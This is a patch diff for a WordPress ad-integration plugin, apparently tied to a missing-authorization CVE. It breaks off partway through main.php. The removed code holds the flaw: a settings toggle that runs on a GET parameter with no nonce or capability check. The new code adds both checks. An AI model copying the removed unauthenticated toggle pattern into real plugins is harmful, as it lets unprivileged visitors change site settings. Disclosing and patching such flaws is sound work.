CVE-2026-24619: PopCash.Net Code Integration Tool <= 1.8 – Missing Authorization (popcashnet-code-integration-tool)

--- a/popcashnet-code-integration-tool/PopcashAab.php
+++ b/popcashnet-code-integration-tool/PopcashAab.php
@@ -1,234 +1,42 @@
 <?php
+/**
+ * Backward compatibility file for PopcashAab.php
+ *
+ * This file is kept for backward compatibility only.
+ * All Anti-Adblock functionality is now in includes/class-anti-adblock.php
+ *
+ * @package PopCash_Code_Integration
+ * @since 1.9
+ * @deprecated 1.9
+ */

-global $popcash_it_vars;
-
-// PopCash Anti AdBlock PHP Script
-// Release Date: 08 December 2022
-// Version: 1.0.1
-
-$UID     =  $popcash_it_vars->uid;    // Your publisherID
-$WID     =  $popcash_it_vars->wid;    // Your domainID
-$TOKEN   =  $popcash_it_vars->apiKey; // Token used in PopCash API
-
-$OPTIONS = [
-  "pop_fback" => $popcash_it_vars->fallback ? 'up' : 'under', // values: 'under' or 'up'
-  "pop_fcap"  => $popcash_it_vars->fcap,  // How many ads we should show in a 24 hours time frame.
-  "pop_delay" => "0", // popunder delay from the user click (in seconds) - Default is 0
-];
-
-class PopcashPublisherScript
-{
-
-  /**
-   * cache
-   *
-   * @var array
-   */
-  protected $cache = [
-    'enabled' => true,
-    'key'     => 'ppch-h6IzF4iRLEdZV-QX82hhpzmvxX--',
-  ];
-
-  /**
-   * endpoint
-   *
-   * @var string
-   */
-  public $endpoint = 'https://api-js.popcash.net/getCode?';
-
-  /**
-   * timeout
-   *
-   * @var int
-   */
-  public $timeout = 2;
-
-  /**
-   * uid
-   *
-   * @var string
-   */
-  public $uid = '0';
-
-  /**
-   * wid
-   *
-   * @var string
-   */
-  public $wid = '0';
-
-  /**
-   * token
-   *
-   * @var string
-   */
-  public $token = '';
-
-  /**
-   * options
-   *
-   * @var array
-   */
-  public $options;
-
-  /**
-   * expiration
-   *
-   * @var int
-   */
-  public $expiration = 10 * 60;
-
-  /**
-   * Constructor
-   *
-   * @param mixed $uid
-   * @param mixed $wid
-   * @param mixed $token
-   * @param array $options
-   */
-  public function __construct($uid, $wid, $token, $options=[])
-  {
-
-    $this->uid           = $uid;
-    $this->wid           = $wid;
-    $this->token         = $token;
-    $this->options       = $options;
-    $this->cache['key'] .= "$uid-$wid";
-  }
-
-  /**
-   * getCode
-   *
-   * @access public
-   */
-  public function getCode()
-  {
-
-
-    $code = $this->getCache()->get($this->cache['key']);
-
-    if($this->cache['enabled'] && $code = $this->getCache()->get($this->cache['key'])) {
-      return (object) ['response' =>$code, 'cacheStatus' => 1];
-    }
-
-    $userAgent = sanitize_text_field( (isset($_SERVER['HTTP_USER_AGENT']) && !empty($_SERVER['HTTP_USER_AGENT']))
-       ? $_SERVER['HTTP_USER_AGENT']
-       : '');
-
-    $response = wp_remote_get($this->endpoint . "uid={$this->uid}&wid={$this->wid}&apikey={$this->token}&" . http_build_query($this->options), [
-      'timeout'    => $this->timeout,
-      'user-agent' => $userAgent,
-    ]);
-
-    $cacheStatus = $this->cache['enabled'];
-
-    $body = wp_remote_retrieve_body($response);
-
-    if ($this->cache['enabled'] && wp_remote_retrieve_response_code($response) == 200) {
-      $cacheStatus = $this->getCache()->set($this->cache['key'], $body, $this->expiration);
-    }
-
-    return (object) [
-      'response'    => $body,
-      'cacheStatus' => $cacheStatus,
-    ];
-  }
-
-  /**
-   * fromCache
-   *
-   * @access public
-   */
-  public function getCache()
-  {
-
-    return new PopcashPublisherScriptSimpleFile($this->expiration);
-  }
-
-  /**
-   * getCacheKey
-   *
-   * @access public
-   */
-  public function getCacheKey()
-  {
-
-    return $this->cache['key'];
-  }
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
 }

-class PopcashPublisherScriptSimpleFile
-{
+// Load settings if not already loaded
+if ( ! class_exists( 'PCIT_Settings' ) ) {
+    require_once plugin_dir_path( __FILE__ ) . 'includes/class-settings.php';
+}

-  /**
-   * expiration
-   *
-   * @var int
-   */
-  protected $expiration;
-
-  /**
-   * Constructor
-   *
-   * @param mixed $expiration
-   */
-  public function __construct($expiration)
-  {
-    $this->expiration = $expiration;
-  }
-
-  /**
-   * set
-   *
-   * @param mixed $filename
-   * @param mixed $content
-   * @access public
-   * @return void
-   */
-  function set($filename, $content)
-  {
-
-    try {
-      $file = @fopen(plugin_dir_path( __FILE__ ) . "$filename", 'w');
-      if (!$file) {
-        return false;
-      }
-      fwrite($file, $content);
-      return fclose($file);
-    } catch (Exception $e) {
-
-      return false;
-    }
-  }
-
-  function get($filename)
-  {
-
-    try {
-      if (!file_exists(plugin_dir_path( __FILE__ ) . "$filename")) {
-        return false;
-      }
-      $content = file_get_contents(plugin_dir_path( __FILE__ ) . "$filename");
-      if (!$content) {
-        return false;
-      }
-      if (time() - filemtime(plugin_dir_path( __FILE__ ) . "$filename") > $this->expiration) {
-        unlink(plugin_dir_path( __FILE__ ) . "$filename");
-        return false;
-      }
-      return $content;
-    } catch (Exception $e) {
-      return false;
-    }
-  }
+// Load Anti-Adblock class
+if ( ! class_exists( 'PCIT_Anti_Adblock' ) ) {
+    require_once plugin_dir_path( __FILE__ ) . 'includes/class-anti-adblock.php';
 }

-$ps = new PopcashPublisherScript($UID , $WID, $TOKEN, $OPTIONS);
+// Get settings
+$settings = PCIT_Settings::get_all();

-echo (
-  "<script type='text/javascript'>" .
-  ($ps->getCode()->cacheStatus == 1 ? "////// {$ps->getCacheKey()}///////nn" : "////// no store//////////nn") . $ps->getCode()->response .
-  "</script>"
+// Initialize and render Anti-Adblock script
+$aab = new PCIT_Anti_Adblock(
+    $settings->uid,
+    $settings->wid,
+    $settings->api_key,
+    [
+        'pop_fback' => $settings->fallback ? 'up' : 'under',
+        'pop_fcap'  => $settings->fcap,
+        'pop_delay' => '0',
+    ]
 );

-?>
+echo $aab->render();
--- a/popcashnet-code-integration-tool/functions.php
+++ b/popcashnet-code-integration-tool/functions.php
@@ -1,23 +1,28 @@
 <?php

-if(isset($_GET['page']) && sanitize_text_field($_GET['page']) == 'popcash-net' && isset($_GET['tab']) && !in_array(sanitize_text_field($_GET['tab']), ['standard-script', 'aab-script', 'manual-integration']) ||
-  (isset($_GET['page']) && sanitize_text_field($_GET['page']) == 'popcash-net' && !isset($_GET['tab']))) {
-
-  $integration = get_option('popcash_net_integration');
-  $tab = 'standard-script';
+/**
+ * Handle tab redirects on admin_init hook
+ */
+add_action('admin_init', function() {
+  if(isset($_GET['page']) && sanitize_text_field($_GET['page']) == 'popcash-net' && isset($_GET['tab']) && !in_array(sanitize_text_field($_GET['tab']), ['standard-script', 'aab-script', 'manual-integration']) ||
+    (isset($_GET['page']) && sanitize_text_field($_GET['page']) == 'popcash-net' && !isset($_GET['tab']))) {
+
+    $integration = get_option('popcash_net_integration');
+    $tab = 'standard-script';
+
+    switch ($integration) {
+      case 1:
+          $tab = 'standard-script';
+          break;
+      case 2:
+          $tab = 'aab-script';
+          break;
+    }

-  switch ($integration) {
-    case 1:
-        $tab = 'standard-script';
-        break;
-    case 2:
-        $tab = 'aab-script';
-        break;
+    wp_safe_redirect(admin_url('admin.php?page=popcash-net&tab=' . $tab));
+    exit;
   }
-
-  header("Location: admin.php?page=popcash-net&tab=" . $tab);
-  exit;
-}
+});

 function pcit_popcash_logo()
 {
@@ -27,11 +32,14 @@

 function pcit_popcash_code_disabled()
 {
-  if (get_option('popcash_net_disabled') == true) { ?>
+  if (get_option('popcash_net_disabled') == true) {
+    $tab = isset($_GET['tab']) ? sanitize_text_field($_GET['tab']) : 'standard-script';
+    $nonce = wp_create_nonce('pcit_popcash_toggle_status');
+    ?>

       <div class="alert alert-danger">
         PopCash.Net Popunder code is currently disabled for your website.
-        Click <a href="<?php echo esc_url('admin.php?page=popcash-net&tab=' . htmlentities((isset($_GET['tab']) ? $_GET['tab'] : 'individual_ids')) . '&d_status=switch') ?>">
+        Click <a href="<?php echo esc_url(admin_url('admin.php?page=popcash-net&tab=' . $tab . '&d_status=switch&_wpnonce=' . $nonce)); ?>">
         here</a> to enable it!
       </div>

@@ -57,102 +65,88 @@

 function pcit_popcash_switch_enabled()
 {
+  // Only process if status switch requested
+  if (!isset($_GET['d_status']) || $_GET['d_status'] !== 'switch') {
+    return;
+  }

-  $a           = "admin.php?page=popcash-net&tab=";
-  $setting     = "popcash_net_disabled";
-  $allowedTabs = ['individual_ids', 'code_integration'];
-
-  $a .= (!isset($_GET['tab'])) || !in_array(sanitize_text_field($_GET['tab']), $allowedTabs) ? 'individual_ids' : sanitize_text_field( $_GET['tab']);
-
-  if (isset($_GET['d_status'])) {
-    if ($_GET['d_status'] == 'switch') {
-      update_option($setting, !(bool)get_option($setting));
-      wp_redirect($a);
-      exit;
-    }
+  // Verify nonce for security
+  if (!isset($_GET['_wpnonce']) || !wp_verify_nonce($_GET['_wpnonce'], 'pcit_popcash_toggle_status')) {
+    wp_die(__('Security check failed. Please try again.', 'popcash-code-integration-tool'));
   }
+
+  // Check user capabilities
+  if (!current_user_can('manage_options')) {
+    wp_die(__('You do not have permission to perform this action.', 'popcash-code-integration-tool'));
+  }
+
+  $setting     = 'popcash_net_disabled';
+  $allowedTabs = ['standard-script', 'aab-script'];
+
+  $tab = isset($_GET['tab']) && in_array(sanitize_text_field($_GET['tab']), $allowedTabs)
+         ? sanitize_text_field($_GET['tab'])
+         : 'standard-script';
+
+  // Toggle the setting
+  update_option($setting, !(bool)get_option($setting));
+
+  // Redirect to clean URL
+  wp_safe_redirect(admin_url('admin.php?page=popcash-net&tab=' . $tab));
+  exit;
 }

 /////////////////////////
 // Output Script
+// Note: These functions are deprecated in v1.9
+// Script output is now handled by PCIT_Frontend class
 /////////////////////////

-function pcit_popcash_add_individual_ids()
-{
-  global $popcash_it_vars;
-  ?>
-  <!-- Start PopCash Popunder Script -->
-  <script type="text/javascript">
-    var uid = '<?php echo esc_html($popcash_it_vars->uid) ?>';
-    var wid = '<?php echo esc_html($popcash_it_vars->wid) ?>';
-    <?php if ($popcash_it_vars->fallback == '1') {
-      echo "var pop_fback = 'up'n";
-    } ?>
-    var pop_tag = document.createElement('script');
-    pop_tag.src = '//cdn.popcash.net/show.js';
-    document.body.appendChild(pop_tag);
-    pop_tag.onerror = function() {
-      pop_tag = document.createElement('script');
-      pop_tag.src = '//cdn2.popcash.net/show.js';
-      document.body.appendChild(pop_tag)
-    };
-  </script>
-  <!-- End PopCash.Net Popunder Script -->
-<?php
+/**
+ * @deprecated 1.9 Use PCIT_Frontend::output_standard_script() instead
+ */
+function pcit_popcash_add_individual_ids() {
+    PCIT_Frontend::output_standard_script();
 }

-function pcit_popcash_add_textarea()
-{
-
-  global $popcash_it_vars;
-
-  echo "<!-- Start PopCash Popunder Script -->n" . $popcash_it_vars->textarea . "n<!-- End PopCash.Net Popunder Script -->nn";
+/**
+ * @deprecated 1.9 No longer used
+ */
+function pcit_popcash_add_textarea() {
+    // Deprecated - manual textarea integration removed
 }

-function pcit_popcash_add_aab()
-{
-
-  include plugin_dir_path( __FILE__ ) . 'PopcashAab.php';
+/**
+ * @deprecated 1.9 Use PCIT_Frontend::output_aab_script() instead
+ */
+function pcit_popcash_add_aab() {
+    PCIT_Frontend::output_aab_script();
 }

 /////////////////////////
 // Validation
+// Note: Validation is now handled by PCIT_Settings class
+// These functions remain for backward compatibility
 /////////////////////////

-function pcit_popcash_uid_validation($uid)
-{
-  $setting = 'popcash_net_uid';
-  if (preg_match("/^[0-9]+$/", $uid)) {
-    return $uid;
-  } else {
-    $message = 'User ID isn't properly formatted';
-    add_settings_error($setting, 'uid-error', $message, 'error');
-    return false;
-  }
+/**
+ * @deprecated 1.9 Use PCIT_Settings::validate_uid() instead
+ */
+function pcit_popcash_uid_validation( $uid ) {
+    return PCIT_Settings::validate_uid( $uid );
 }

-function pcit_popcash_wid_validation($wid)
-{
-  $setting = 'popcash_net_wid';
-  if (preg_match("/^[0-9]+$/", $wid)) {
-    return $wid;
-  } else {
-    $message = 'Website ID isn't properly formatted';
-    add_settings_error($setting, 'wid-error', $message, 'error');
-    return false;
-  }
+/**
+ * @deprecated 1.9 Use PCIT_Settings::validate_wid() instead
+ */
+function pcit_popcash_wid_validation( $wid ) {
+    return PCIT_Settings::validate_wid( $wid );
 }

-function pcit_popcash_fallback_validation($fallback)
-{
-  $setting = 'popcash_net_fallback';
-  if (in_array($fallback, [0, 1])) {
-    return $fallback;
-  } else {
-    $message = 'Fallback isn't properly formatted';
-    add_settings_error($setting, 'wid-error', $message, 'error');
-    return false;
-  }
+/**
+ * @deprecated 1.9 Use PCIT_Settings::validate_fallback() instead
+ */
+function pcit_popcash_fallback_validation( $fallback ) {
+    return PCIT_Settings::validate_fallback( $fallback );
 }


@@ -164,6 +158,8 @@
       && !count(get_settings_errors('popcash_net_uid'))
       && !count(get_settings_errors('popcash_net_fallback'))
       && (isset($_GET['tab']) && $_GET['tab'] == 'standard-script')
+      && !empty(get_option('popcash_net_uid'))
+      && !empty(get_option('popcash_net_wid'))
     );
   }

@@ -174,6 +170,8 @@
       && !count(get_settings_errors('popcash_net_fcap'))
       && !count(get_settings_errors('popcash_net_api_key'))
       && (isset($_GET['tab']) && $_GET['tab'] == 'aab-script')
+      && !empty(get_option('popcash_net_api_key'))
+      && !empty(get_option('popcash_net_wid'))
     );
   }

@@ -187,7 +185,12 @@
 /////////////////////////
 function pcit_popcash_popcash_net_publisher_code()
 {
-
-  include plugin_dir_path( __FILE__ ) . 'template/index.php';
-  include plugin_dir_path( __FILE__ ) . 'template/forms.php';
+    // Use new modern template (v1.9+)
+    if ( file_exists( plugin_dir_path( __FILE__ ) . 'template/index-new.php' ) ) {
+        include plugin_dir_path( __FILE__ ) . 'template/index-new.php';
+    } else {
+        // Fallback to old template
+        include plugin_dir_path( __FILE__ ) . 'template/index.php';
+        include plugin_dir_path( __FILE__ ) . 'template/forms.php';
+    }
 }
--- a/popcashnet-code-integration-tool/includes/class-activator.php
+++ b/popcashnet-code-integration-tool/includes/class-activator.php
@@ -0,0 +1,90 @@
+<?php
+/**
+ * Handles plugin activation and deactivation
+ *
+ * @package PopCash_Code_Integration
+ * @since 1.9
+ */
+
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
+class PCIT_Activator {
+
+    /**
+     * Plugin activation handler
+     *
+     * @since 1.9
+     */
+    public static function activate() {
+        // Set default options
+        add_option( 'popcash_net_uid', '', '', 'yes' );
+        add_option( 'popcash_net_wid', '', '', 'yes' );
+        add_option( 'popcash_net_fcap', '1', '', 'yes' );
+        add_option( 'popcash_net_fallback', '', '', 'yes' );
+        add_option( 'popcash_net_api_key', '', '', 'yes' );
+        add_option( 'popcash_net_disabled', '0', '', 'yes' );
+        add_option( 'popcash_net_integration', '0', '', 'yes' );
+
+        // Flush rewrite rules if needed
+        flush_rewrite_rules();
+    }
+
+    /**
+     * Plugin deactivation handler
+     *
+     * @since 1.9
+     */
+    public static function deactivate() {
+        // Clean up transients
+        self::cleanup_transients();
+
+        // Flush rewrite rules
+        flush_rewrite_rules();
+    }
+
+    /**
+     * Plugin uninstall handler
+     * Called from uninstall.php
+     *
+     * @since 1.9
+     */
+    public static function uninstall() {
+        // Remove all options
+        delete_option( 'popcash_net_uid' );
+        delete_option( 'popcash_net_wid' );
+        delete_option( 'popcash_net_fallback' );
+        delete_option( 'popcash_net_disabled' );
+        delete_option( 'popcash_net_api_key' );
+        delete_option( 'popcash_net_fcap' );
+        delete_option( 'popcash_net_integration' );
+
+        // Clean up transients
+        self::cleanup_transients();
+    }
+
+    /**
+     * Clean up all plugin transients
+     *
+     * @since 1.9
+     */
+    private static function cleanup_transients() {
+        global $wpdb;
+
+        // Delete all transients that start with pcit_cache_
+        $wpdb->query(
+            $wpdb->prepare(
+                "DELETE FROM {$wpdb->options} WHERE option_name LIKE %s",
+                $wpdb->esc_like( '_transient_pcit_cache_' ) . '%'
+            )
+        );
+
+        $wpdb->query(
+            $wpdb->prepare(
+                "DELETE FROM {$wpdb->options} WHERE option_name LIKE %s",
+                $wpdb->esc_like( '_transient_timeout_pcit_cache_' ) . '%'
+            )
+        );
+    }
+}
--- a/popcashnet-code-integration-tool/includes/class-anti-adblock.php
+++ b/popcashnet-code-integration-tool/includes/class-anti-adblock.php
@@ -0,0 +1,153 @@
+<?php
+/**
+ * PopCash Anti-Adblock Integration
+ *
+ * @package PopCash_Code_Integration
+ * @since 1.9
+ */
+
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
+class PCIT_Anti_Adblock {
+
+    /**
+     * API endpoint
+     *
+     * @var string
+     */
+    private $endpoint = 'https://api-js.popcash.net/getCode?';
+
+    /**
+     * Request timeout in seconds
+     *
+     * @var int
+     */
+    private $timeout = 2;
+
+    /**
+     * Cache expiration in seconds (10 minutes)
+     *
+     * @var int
+     */
+    private $expiration = 600;
+
+    /**
+     * User ID
+     *
+     * @var string
+     */
+    private $uid;
+
+    /**
+     * Website ID
+     *
+     * @var string
+     */
+    private $wid;
+
+    /**
+     * API Token
+     *
+     * @var string
+     */
+    private $token;
+
+    /**
+     * Configuration options
+     *
+     * @var array
+     */
+    private $options;
+
+    /**
+     * Cache key
+     *
+     * @var string
+     */
+    private $cache_key;
+
+    /**
+     * Constructor
+     *
+     * @param string $uid User ID
+     * @param string $wid Website ID
+     * @param string $token API Token
+     * @param array $options Configuration options
+     */
+    public function __construct( $uid, $wid, $token, $options = [] ) {
+        $this->uid     = $uid;
+        $this->wid     = $wid;
+        $this->token   = $token;
+        $this->options = $options;
+
+        // Generate cache key
+        $this->cache_key = 'pcit_cache_' . md5( "aab-{$uid}-{$wid}" );
+    }
+
+    /**
+     * Get script code from API or cache
+     *
+     * @return array
+     */
+    private function get_code() {
+        // Try to get from cache first
+        $cached_code = get_transient( $this->cache_key );
+
+        if ( false !== $cached_code ) {
+            return [
+                'response'     => $cached_code,
+                'cache_status' => true,
+            ];
+        }
+
+        // Fetch from API
+        $user_agent = isset( $_SERVER['HTTP_USER_AGENT'] )
+            ? sanitize_text_field( wp_unslash( $_SERVER['HTTP_USER_AGENT'] ) )
+            : '';
+
+        $url = $this->endpoint . http_build_query( [
+            'uid'    => $this->uid,
+            'wid'    => $this->wid,
+            'apikey' => $this->token,
+        ] ) . '&' . http_build_query( $this->options );
+
+        $response = wp_remote_get( $url, [
+            'timeout'    => $this->timeout,
+            'user-agent' => $user_agent,
+        ] );
+
+        $body         = wp_remote_retrieve_body( $response );
+        $cache_status = false;
+
+        // Cache the response if successful
+        if ( 200 === wp_remote_retrieve_response_code( $response ) && ! empty( $body ) ) {
+            $cache_status = set_transient( $this->cache_key, $body, $this->expiration );
+        }
+
+        return [
+            'response'     => $body,
+            'cache_status' => $cache_status,
+        ];
+    }
+
+    /**
+     * Render the script tag
+     *
+     * @return string
+     */
+    public function render() {
+        $code_data = $this->get_code();
+
+        $cache_comment = $code_data['cache_status']
+            ? "////// Cached: {$this->cache_key} //////nn"
+            : "////// Live fetch //////nn";
+
+        return sprintf(
+            "<script type='text/javascript'>%s%s</script>",
+            $cache_comment,
+            $code_data['response']
+        );
+    }
+}
--- a/popcashnet-code-integration-tool/includes/class-frontend.php
+++ b/popcashnet-code-integration-tool/includes/class-frontend.php
@@ -0,0 +1,86 @@
+<?php
+/**
+ * Frontend script output
+ *
+ * @package PopCash_Code_Integration
+ * @since 1.9
+ */
+
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
+class PCIT_Frontend {
+
+    /**
+     * Initialize frontend hooks
+     *
+     * @since 1.9
+     */
+    public static function init() {
+        // Only add scripts if plugin is enabled
+        if ( ! PCIT_Settings::is_enabled() ) {
+            return;
+        }
+
+        // Add appropriate script based on integration type
+        if ( PCIT_Settings::is_aab_active() ) {
+            add_action( 'wp_footer', [ __CLASS__, 'output_aab_script' ] );
+        } elseif ( PCIT_Settings::is_standard_active() ) {
+            add_action( 'wp_footer', [ __CLASS__, 'output_standard_script' ] );
+        }
+    }
+
+    /**
+     * Output standard PopCash script
+     *
+     * @since 1.9
+     */
+    public static function output_standard_script() {
+        $settings = PCIT_Settings::get_all();
+        ?>
+<!-- Start PopCash Popunder Script -->
+<script type="text/javascript">
+    var uid = '<?php echo esc_js( $settings->uid ); ?>';
+    var wid = '<?php echo esc_js( $settings->wid ); ?>';
+    <?php if ( $settings->fallback == '1' ) : ?>
+    var pop_fback = 'up';
+    <?php endif; ?>
+    var pop_tag = document.createElement('script');
+    pop_tag.src = '//cdn.popcash.net/show.js';
+    document.body.appendChild(pop_tag);
+    pop_tag.onerror = function() {
+        pop_tag = document.createElement('script');
+        pop_tag.src = '//cdn2.popcash.net/show.js';
+        document.body.appendChild(pop_tag)
+    };
+</script>
+<!-- End PopCash Popunder Script -->
+        <?php
+    }
+
+    /**
+     * Output Anti-Adblock script
+     *
+     * @since 1.9
+     */
+    public static function output_aab_script() {
+        $settings = PCIT_Settings::get_all();
+
+        // Use the Anti-Adblock class
+        require_once plugin_dir_path( dirname( __FILE__ ) ) . 'includes/class-anti-adblock.php';
+
+        $aab = new PCIT_Anti_Adblock(
+            $settings->uid,
+            $settings->wid,
+            $settings->api_key,
+            [
+                'pop_fback' => $settings->fallback ? 'up' : 'under',
+                'pop_fcap'  => $settings->fcap,
+                'pop_delay' => '0',
+            ]
+        );
+
+        echo $aab->render();
+    }
+}
--- a/popcashnet-code-integration-tool/includes/class-settings.php
+++ b/popcashnet-code-integration-tool/includes/class-settings.php
@@ -0,0 +1,193 @@
+<?php
+/**
+ * Settings management class
+ *
+ * @package PopCash_Code_Integration
+ * @since 1.9
+ */
+
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
+class PCIT_Settings {
+
+    /**
+     * Get a specific option value
+     *
+     * @param string $key Option key
+     * @param mixed $default Default value
+     * @return mixed
+     */
+    public static function get( $key, $default = '' ) {
+        return get_option( 'popcash_net_' . $key, $default );
+    }
+
+    /**
+     * Update a specific option value
+     *
+     * @param string $key Option key
+     * @param mixed $value Option value
+     * @return bool
+     */
+    public static function update( $key, $value ) {
+        return update_option( 'popcash_net_' . $key, $value );
+    }
+
+    /**
+     * Delete a specific option
+     *
+     * @param string $key Option key
+     * @return bool
+     */
+    public static function delete( $key ) {
+        return delete_option( 'popcash_net_' . $key );
+    }
+
+    /**
+     * Get all settings as an object
+     *
+     * @return object
+     */
+    public static function get_all() {
+        return (object) [
+            'uid'         => self::get( 'uid' ),
+            'wid'         => self::get( 'wid' ),
+            'fallback'    => self::get( 'fallback' ),
+            'fcap'        => self::get( 'fcap', '1' ),
+            'api_key'     => self::get( 'api_key' ),
+            'integration' => self::get( 'integration', '0' ),
+            'disabled'    => self::get( 'disabled', '0' ),
+        ];
+    }
+
+    /**
+     * Check if plugin is enabled
+     *
+     * @return bool
+     */
+    public static function is_enabled() {
+        return self::get( 'disabled' ) != '1';
+    }
+
+    /**
+     * Check if standard script integration is active
+     *
+     * @return bool
+     */
+    public static function is_standard_active() {
+        return self::get( 'integration' ) == '1'
+            && ! empty( self::get( 'uid' ) )
+            && ! empty( self::get( 'wid' ) );
+    }
+
+    /**
+     * Check if anti-adblock integration is active
+     *
+     * @return bool
+     */
+    public static function is_aab_active() {
+        return self::get( 'integration' ) == '2'
+            && ! empty( self::get( 'api_key' ) )
+            && ! empty( self::get( 'wid' ) );
+    }
+
+    /**
+     * Validate UID
+     *
+     * @param string $uid User ID
+     * @return string
+     */
+    public static function validate_uid( $uid ) {
+        $uid = trim( $uid );
+        $wid = isset( $_POST['popcash_net_wid'] ) ? trim( $_POST['popcash_net_wid'] ) : '';
+
+        // If both are empty, allow (clearing settings)
+        if ( empty( $uid ) && empty( $wid ) ) {
+            return '';
+        }
+
+        // If UID is empty but WID is not, show warning but still save
+        if ( empty( $uid ) && ! empty( $wid ) ) {
+            add_settings_error(
+                'popcash_net_uid',
+                'uid-required',
+                __( 'User ID is required.', 'popcash-code-integration-tool' ),
+                'error'
+            );
+            return $uid; // Save the empty value
+        }
+
+        // Validate format but still save even if invalid
+        if ( ! preg_match( '/^[0-9]+$/', $uid ) ) {
+            add_settings_error(
+                'popcash_net_uid',
+                'uid-error',
+                __( 'User ID isn't properly formatted. It should contain only numbers.', 'popcash-code-integration-tool' ),
+                'error'
+            );
+        }
+
+        return $uid;
+    }
+
+    /**
+     * Validate WID
+     *
+     * @param string $wid Website ID
+     * @return string
+     */
+    public static function validate_wid( $wid ) {
+        $wid = trim( $wid );
+        $uid = isset( $_POST['popcash_net_uid'] ) ? trim( $_POST['popcash_net_uid'] ) : '';
+
+        // If both are empty, allow (clearing settings)
+        if ( empty( $wid ) && empty( $uid ) ) {
+            return '';
+        }
+
+        // If WID is empty but UID is not, show warning but still save
+        if ( empty( $wid ) && ! empty( $uid ) ) {
+            add_settings_error(
+                'popcash_net_wid',
+                'wid-required',
+                __( 'Website ID is required.', 'popcash-code-integration-tool' ),
+                'error'
+            );
+            return $wid; // Save the empty value
+        }
+
+        // Validate format but still save even if invalid
+        if ( ! preg_match( '/^[0-9]+$/', $wid ) ) {
+            add_settings_error(
+                'popcash_net_wid',
+                'wid-error',
+                __( 'Website ID isn't properly formatted. It should contain only numbers.', 'popcash-code-integration-tool' ),
+                'error'
+            );
+        }
+
+        return $wid;
+    }
+
+    /**
+     * Validate fallback setting
+     *
+     * @param string $fallback Fallback value
+     * @return string|bool
+     */
+    public static function validate_fallback( $fallback ) {
+        if ( in_array( $fallback, [ '0', '1', 0, 1 ], true ) ) {
+            return $fallback;
+        }
+
+        add_settings_error(
+            'popcash_net_fallback',
+            'fallback-error',
+            __( 'Fallback value isn't properly formatted.', 'popcash-code-integration-tool' ),
+            'error'
+        );
+
+        return false;
+    }
+}
--- a/popcashnet-code-integration-tool/main.php
+++ b/popcashnet-code-integration-tool/main.php
@@ -1,104 +1,124 @@
 <?php
-/*
-Plugin Name: PopCash Code Integration Tool
-Plugin URI: https://popcash.net/
-Description: PopCash Popunder code integration plugin
-Version: 1.8
-Author: PopCash
-Author URI: http://popcash.net/
-*/
-
-register_activation_hook(__FILE__, 'popcash_net_install');
-register_deactivation_hook(__FILE__, 'popcash_net_remove');
-
-function popcash_net_install()
-{
-  add_option("popcash_net_uid"         , '' , '', 'yes');
-  add_option("popcash_net_wid"         , '' , '', 'yes');
-  add_option("popcash_net_fcap"        , '1', '', 'yes');
-  add_option("popcash_net_fallback"    , '' , '', 'yes');
-  add_option("popcash_net_api_key"     , '' , '', 'yes');
-  add_option("popcash_net_disabled"    , '0', '', 'yes');
-  add_option("popcash_net_integration" , '0', '', 'yes');
-}
-
-function popcash_net_remove()
-{
-  delete_option('popcash_net_uid');
-  delete_option('popcash_net_wid');
-  delete_option('popcash_net_fallback');
-  delete_option('popcash_net_disabled');
-  delete_option('popcash_net_api_key');
-  delete_option('popcash_net_fcap');
-  delete_option('popcash_net_integration');
-}
-
-function pcit_popcash_register_mysettings()
-{
-  register_setting('myoption-group', 'popcash_net_disabled', 'pcit_popcash_switch_enabled');
-
-  register_setting('myoption-group', 'popcash_net_uid', 'pcit_popcash_uid_validation');
-  register_setting('myoption-group', 'popcash_net_wid', 'pcit_popcash_wid_validation');
-  register_setting('myoption-group', 'popcash_net_fallback', 'pcit_popcash_fallback_validation');
-
-
-  register_setting('myoption-group3', 'popcash_net_uid', 'pcit_popcash_uid_validation');
-  register_setting('myoption-group3', 'popcash_net_wid', 'pcit_popcash_wid_validation');
-  register_setting('myoption-group3', 'popcash_net_fallback', 'pcit_popcash_fallback_validation');
-  register_setting('myoption-group3', 'popcash_net_api_key');
-  register_setting('myoption-group3', 'popcash_net_fcap');
-}
-
-function pcit_popcash_load_custom_wp_admin_style($hook)
-{
-  if($hook != 'toplevel_page_popcash-net') {
-    return;
-  }
-  wp_register_script( 'pcit_popcash_script', plugins_url( 'assets/pcit_popcash_script.js', __FILE__ ), false, '' );
-  wp_enqueue_script( 'pcit_popcash_script' );
-
-  wp_register_style('pcit_popcash_bootstrap', plugins_url('assets/bootstrap.min.css', __FILE__), false, '');
-  wp_enqueue_style('pcit_popcash_bootstrap');
-
-  wp_register_style('pcit_popcash_pcit_popcash_style', plugins_url('assets/pcit_popcash_style.css', __FILE__), false, '');
-  wp_enqueue_style('pcit_popcash_pcit_popcash_style');
-
-  wp_localize_script(
-    'pcit_popcash_script',
-    'pcit_popcash_globals', [ 'fcap' => get_option('popcash_net_fcap') ]
-  );
-}
-add_action('admin_enqueue_scripts', 'pcit_popcash_load_custom_wp_admin_style');
-
-if (is_admin()) {
-
-  add_action('admin_menu', 'pcit_popcash_popcash_net_admin_menu');
-  add_action('admin_init', 'pcit_popcash_register_mysettings');
-  add_action('wp_loaded' , 'pcit_popcash_switch_enabled');
-
-  function pcit_popcash_popcash_net_admin_menu()
-  {
